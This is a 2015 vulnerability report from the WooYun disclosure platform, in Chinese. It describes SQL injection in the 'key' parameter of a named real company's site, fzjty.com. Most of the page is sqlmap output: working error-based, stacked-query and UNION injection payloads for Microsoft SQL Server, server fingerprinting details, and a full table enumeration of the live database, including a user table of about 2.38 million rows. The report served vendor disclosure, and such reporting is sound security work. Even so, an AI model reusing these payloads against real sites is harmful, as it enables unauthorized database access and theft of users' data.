当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
wooyun-2015-0154822
漏洞标题:
方直科技主站存在SQL注入漏洞
相关厂商:
fzjty.com
漏洞作者:
凉凉
提交时间:
2015-11-23 14:11
修复时间:
2016-01-11 15:32
公开时间:
2016-01-11 15:32
漏洞类型:
SQL注射漏洞
危害等级:
自评Rank:
15
漏洞状态:
厂商已经确认
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:
>

漏洞详情

披露状态:

2015-11-23: 细节已通知厂商并且等待厂商处理中
2015-11-27: 厂商已经确认,细节仅向厂商公开
2015-12-07: 细节向核心白帽子及相关领域专家公开
2015-12-17: 细节向普通白帽子公开
2015-12-27: 细节向实习白帽子公开
2016-01-11: 细节向公众公开

简要描述:

详细说明:

http://www.fzjty.com/ProList.html?key=N

31.jpg

qlmap resumed the following injection point(s) from stored session:
---
Parameter: key (GET)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: key=N%' AND 5624=CONVERT(INT,(SELECT CHAR(113)+CHAR(122)+CHAR(122)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (5624=5624) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(118)+CHAR(98)+CHAR(113))) AND '%'='
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: key=N%';WAITFOR DELAY '0:0:5'--
    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: key=N%' UNION ALL SELECT CHAR(113)+CHAR(122)+CHAR(122)+CHAR(106)+CHAR(113)+CHAR(120)+CHAR(117)+CHAR(77)+CHAR(84)+CHAR(109)+CHAR(70)+CHAR(100)+CHAR(121)+CHAR(97)+CHAR(108)+CHAR(113)+CHAR(118)+CHAR(118)+CHAR(98)+CHAR(113)-- 
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
Database: ksshop2
+-----------------------------+---------+
| Table                       | Entries |
+-----------------------------+---------+
| dbo.UserNumInfo             | 2384686 |
| dbo.mobiler_code            | 298310  |
| dbo.SerialNumber            | 226323  |
| dbo.ViewProduct             | 84232   |
| dbo.UserNumberRunTime       | 61600   |
| dbo.Message                 | 25145   |
| dbo.CheckRecord             | 12530   |
| dbo.TbKeyWordMonitor        | 12241   |
| dbo.TbKeyWordMonitor        | 12241   |
| dbo.tb_orderitem            | 10399   |
| dbo.tb_orderitem            | 10399   |
| dbo.tb_area                 | 3149    |
| dbo.vi_area_all             | 3149    |
| dbo.User_Product            | 2718    |
| dbo.View_AreaUserProduct    | 2718    |
| dbo.CourseInfo              | 1522    |
| dbo.tb_ChinaTeacherOrders   | 1323    |
| dbo.Requestinfo_Product     | 853     |
| dbo.Requestinfo_Product     | 853     |
| dbo.tb_ExpProduct           | 828     |
| dbo.[ShoolStatistics ]      | 743     |
| dbo.tb_activeproduct        | 610     |
| dbo.tb_FavProduct           | 535     |
| dbo.tb_unitinfo             | 487     |
| dbo.vi_unitinfo_all         | 487     |
| dbo.vi_unitinfo_studentname | 487     |
| dbo.mobile_area             | 460     |
| dbo.tb_product              | 350     |
| dbo.teachinfo               | 350     |
| dbo.View_GradeName          | 350     |
| dbo.View_PackAge            | 350     |
| dbo.View_ProductUnion       | 350     |
| dbo.View_tb_product         | 350     |
| dbo.View_Teachinfo          | 350     |
| dbo.View_TypeName           | 350     |
| dbo.tb_city                 | 348     |
| dbo.SpecialPriceProduct     | 346     |
| dbo.SpecialPriceProduct     | 346     |
| dbo.tb_subjectclass         | 334     |
| dbo.tb_subjectclass         | 334     |
| dbo.AreaStatistics          | 306     |
| dbo.CategoryArea            | 209     |
| dbo.TbShoppingCart          | 185     |
| dbo.prodmodule              | 170     |
| dbo.BatchInformation        | 157     |
| dbo.tb_UserHelpQuestion     | 114     |
| dbo.tb_student              | 91      |
| dbo.vi_student_classes      | 91      |
| dbo.tb_righttree            | 84      |
| dbo.tb_unitclass            | 81      |
| dbo.vi_unitclass_name       | 81      |
| dbo.tb_idea                 | 74      |
| dbo.vi_teacher_unitclass    | 66      |
| dbo.tb_unitname             | 57      |
| dbo.tb_classes              | 40      |
| dbo.TbMenu                  | 40      |
| dbo.vi_class_school         | 40      |
| dbo.VersionFileName         | 36      |
| dbo.tb_province             | 34      |
| dbo.TbAdvertize             | 31      |
| dbo.tb_category             | 30      |
| dbo.tb_grade                | 30      |
| dbo.vi_category_all         | 30      |
| dbo.tb_company              | 27      |
| dbo.tb_knowledge            | 24      |
| dbo.tb_UserHelper           | 24      |
| dbo.tb_UserHelper           | 24      |
| dbo.tb_AdminHelper          | 20      |
| dbo.Package                 | 19      |
| dbo.tb_HyperLink            | 18      |
| dbo.Concern                 | 16      |
| dbo.tb_AdminHelpQuestion    | 15      |
| dbo.tb_announcement         | 14      |
| dbo.Gradearea               | 13      |
| dbo.tb_job                  | 13      |
| dbo.Type                    | 13      |
| dbo.tb_serverlnow           | 12      |
| dbo.tb_treeclass            | 11      |
| dbo.tb_treeclass            | 11      |
| dbo.tb_materialinfo         | 10      |
| dbo.vi_teacher_classes      | 10      |
| dbo.tb_contect              | 9       |
| dbo.ActiveRange             | 7       |
| dbo.dtproperties            | 7       |
| dbo.tb_Region               | 6       |
| dbo.TbLocation              | 6       |
| dbo.Promotion               | 5       |
| dbo.tb_manager              | 5       |
| dbo.tb_rightmanager         | 5       |
| dbo.tb_rightmanager         | 5       |
| dbo.tb_school               | 5       |
| dbo.tb_teachers             | 5       |
| dbo.Exp_Orde                | 4       |
| dbo.PresentType             | 4       |
| dbo.tb_payment              | 3       |
| dbo.VersionManage           | 3       |
| dbo.tb_deliver              | 2       |
| dbo.tb_knowcate             | 2       |
| dbo.tb_WareHouse            | 2       |
| dbo.ActiveInformation       | 1       |
| dbo.comments                | 1       |
| dbo.FreeFare                | 1       |
| dbo.ImageInfo               | 1       |
| dbo.tb_materialactive       | 1       |
| dbo.tb_materialschool       | 1       |
| dbo.TbProductAdvertize      | 1       |
| dbo.TbVisit                 | 1       |
+-----------------------------+---------+

漏洞证明:

修复方案:

版权声明:转载请注明来源 凉凉@乌云

>

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2015-11-27 09:07

厂商回复:

修复中,谢谢

最新状态:

暂无